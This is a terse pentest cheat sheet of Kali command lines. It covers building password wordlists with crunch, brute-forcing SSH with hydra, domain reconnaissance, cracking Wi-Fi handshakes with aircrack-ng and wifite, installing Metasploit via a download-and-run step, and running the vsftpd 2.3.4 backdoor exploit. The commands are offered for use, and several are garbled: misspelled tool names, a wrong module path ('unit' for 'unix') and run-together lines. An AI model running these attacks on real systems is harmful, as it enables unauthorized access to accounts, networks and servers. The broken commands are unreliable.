Kali Pentest Netsec

Password Cracking

generate wordlists with CRUNCH

start Crunch on Kali

crunch <min> <max> <caracter set> -o <output file>

> crunc 5 18 password123$ -o wordlist.txt

if youre a certain a certain string is in a password,ie "ballz" is in a user's password in any permutation,

> crunch 5 18 -p ballz <insert any other strings> > crunch 3 20 -p ballz nutz deez -o wordlist.txt

get max 25 # of passwords and split wordlists by chunks of 30MB each

> crunch 3 10 -c 25 -b 30mb -o START

compress wordlist

> crunch 3 10 pass123 -z 7z -o START


crack passwords for single username

hydra -l username -P pw.txt -vV -f -t 5 ssh

crack pw from username list

hydra -L users.txt -P pw.txt -vVfF -t 5 ssh

Domain sniffing

get all pub IPs for domain

fierce --domain mydomain.com 

also query: dnsdumpster.com 


pip3 install shodan
shodan init <API KEY>

scan a IP range


Wifi Cracking

apt install aircrack-ng

put wifi iface into Monitor mode

check if iface can do monitor mode

iw list (check Mode)
airmon-ng check

kill procs holding up iface
airmon-ng check kill

start monitor
airmon-ng start <name of wifi iface>

stop monitor
airmon-ng stop wlan0mon

use wifite to do all above
wifite --wpa --dict /usr/share/wordlists/rockyou.txt --kill

crack password of captured pcap
aircrack-ng capturedpackets.cap -w wordlist.txt



curl curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

chmod +x msfinstall && ./msfinstall

msfdb init

enter console


configure target and port

> set RHOST <IP or hostname>
> set RPORT <PORT>

search payload, 

search type:exploit platform:unixsearch type:exploit sshsearch type:exploit platform:osx

example: vsfptpd

use exploit/unit/ftp/vsftpd_234_backdoor

check current payload and options

show optionsshow payloads

run payload
